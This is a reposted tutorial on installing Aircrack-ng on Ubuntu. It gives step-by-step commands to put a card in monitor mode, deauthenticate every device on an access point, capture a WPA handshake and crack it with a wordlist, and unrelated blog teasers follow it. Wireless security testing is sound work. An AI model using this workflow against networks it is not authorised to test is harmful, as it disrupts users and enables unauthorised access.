Skip to main content

Install Aircrack-ng on Ubuntu linux OS





Install Aircrack-ng on Ubuntu


Aircrack-ng is a whole suite of tools for Wireless Security Auditing. It can be used to monitor, test, crack or attack Wireless Security Protocols like WEP, WPA, WPA2. Aircrack-ng is command line based and is available for Windows and Mac OS and other Unix based Operating systems. Aircrack-ng suite contains a lot of tools used for various purposes but here we’ll only look at some important tools that are used more often in Wireless Security testing.
Airmon-ng
Airmon-ng is used to manage wireless card modes and to kill unnecessary processes while using aircrack-ng. To sniff a wireless connection, you need to change your wireless card from managed mode to monitor mode and airmon-ng is used for that purpose.
Airodump-ng
Airodump-ng is a wireless sniffer that can capture wireless data from one or more wireless Access Points. It is used to analyze nearby Access Points and to capture handshakes.
Aireplay-ng
Aireplay-ng is used for replay attacks and as packet injector. It can be de-authenticate users from their APs to capture handshakes.
Airdecap-ng
Airdecap-ng is used to decrypt encrypted WEP, WPA/WPA2 wireless packets with known key.
Aircrack-ng
Aircrack-ng is used to attack WPA/WEP wireless protocols in order to find the key.

Installation

Aircrack-ng is easy to install in Ubuntu using APT. Just type the following command and this will install all tools available in Aircrack-ng suite.
sudo apt-get update
sudo apt-get install -y aircrack-ng

Usage

In this article, we’ll take a quick look at how to use aircrack-ng to crack an encrypted wireless network (TR1CKST3R in this example) to find the password.
First of all, list out all available wireless cards connected to your PC using ‘iwconfig’ command.
We’ll use ‘wlxc83a35cb4546’ named wireless card for this tutorial (This might be different in your case). Now, kill all the processes running on wireless card using airmon-ng.
ubuntu@ubuntu:~$ sudo airmon-ng check kill
Start Monitor mode on ‘wlxc83a35cb4546’ by typing
ubuntu@ubuntu:~$ sudo airmon-ng start wlxc83a35cb4546
Now, airmon-ng has started Monitor mode on wireless card, it’ll appear as different name ‘wlan0mon’. Run ‘iwconfig’ again to list wireless details.
Then, use airodump-ng to see nearby Wireless Access Points and their properties.
ubuntu@ubuntu:~$ sudo airodump-ng wlan0mon
You can narrow down search using MAC (–bssid) and channel (-c) filters. To capture handshake (Handshake contains encrypted password), we need to save our packets somewhere using “–write” option. Type,
ubuntu@ubuntu:~$ sudo airodump-ng --bssid 6C:B7:49:FC:62:E4
 -c 11 wlan0mon --write /tmp/handshake.cap

--bssid : Access Point’s MAC Address

-c : Access Point’s channel [1-13]

--write : Stores captured packets at a defined location
Now, we need to de-authenticate every device from this Access Point using Aireplay-ng utility. Write
ubuntu@ubuntu:~$ sudo aireplay-ng -0 100 -a [MAC_ADD] wlan0mon
-a : Specify Access Points MAC for Aireplay-ng
-0 : Specify number of deauth packets to send
After a while, all devices will be disconnected from that Access Point, when they’ll try to reconnect, running airodump-ng will capture the handshake. It’ll appear at the top of running airodump-ng.
Handshake is stored in ‘/tmp/’ directory, and contains encrypted password that can be brute forced offline using a dictionary. To crack the password, we’ll be using Aircrack-ng. Type
ubuntu@ubuntu:~$ sudo aircrack-ng /tmp/handshake.cap-01.cap -w
/usr/share/wordlists/rockyou.txt
-w : Specify the dictionary location
Aircrack-ng will go through the list of passwords, and if found, it’ll display the password used as key.
In this case, aircrack-ng found the password used ‘123456789’.
Now, stop Monitor mode on wireless card and restart the network-manager.
ubuntu@ubuntu:~$ sudo airmon-ng stop wlan0mon
ubuntu@ubuntu:~$ sudo service network-manager restart

Conclusion

Aircrack-ng can be used to audit Wireless Security or to crack forgotten passwords. There are some other similar tools available for this purpose like Kismet but aircrack-ng is better known for good support, versatility and having wide range of tools. 


                                                                                             source:https://linuxhint.com/install_aircrack-ng_ubuntu/

Comments

Popular posts from this blog

The star cluster closest to Earth is in its death throes-Stars in the Hyades are moving so fast it will disintegrate in 30 million years

The closest cluster of stars to Earth is falling apart and will soon die, astronomers say. Using the Gaia spacecraft to measure velocities of stars in the Hyades cluster and those escaping from it, researchers have  predicted the cluster’s demise . “We find that there’s only something like 30 million years left for the cluster to lose its mass completely,” says Semyeong Oh, an astronomer at the University of Cambridge. “Compared to the Hyades’ age, that’s very short,” she says. The star cluster, just 150 light-years away and visible to the naked eye in the constellation Taurus, formed about 680 million years ago from a large cloud of gas and dust in the Milky Way. Stellar gatherings such as the Hyades, known as open star clusters, are born with hundreds or thousands of stars that are held close to one another by their mutual gravitational pull. But numerous forces try to tear them apart: Supernova explosions from the most massive stars eject material that had been binding the clust...

Heartburn medicine doesn’t work as a COVID-19 antiviral - New findings don’t rule out the chance the antacid might help in other ways

An over-the-counter heartburn remedy probably won’t directly stop coronavirus infections, a new study suggests. Anecdotal reports from China suggested people hospitalized with COVID-19 who were taking famotidine (sold under the brand name Pepcid) had better outcomes than people who took a different type of antacid called a proton pump inhibitor. But famotidine has  no direct antiviral activity  against SARS-CoV-2, the virus that causes COVID-19, according to preliminary results reported July 15 at bioRxiv.org. Those findings, which have not been reviewed by other scientists yet, suggest famotidine won’t help prevent coronavirus infections or illness. But they don’t rule out that the drug might help in other ways, says Mohsan Saeed, a virologist at Boston University School of Medicine. “We’re not challenging that famotidine might help,” he says. “We’re saying that the mechanism of action is not antiviral.” The result isn’t a complete surprise. “A compound of this nature having ...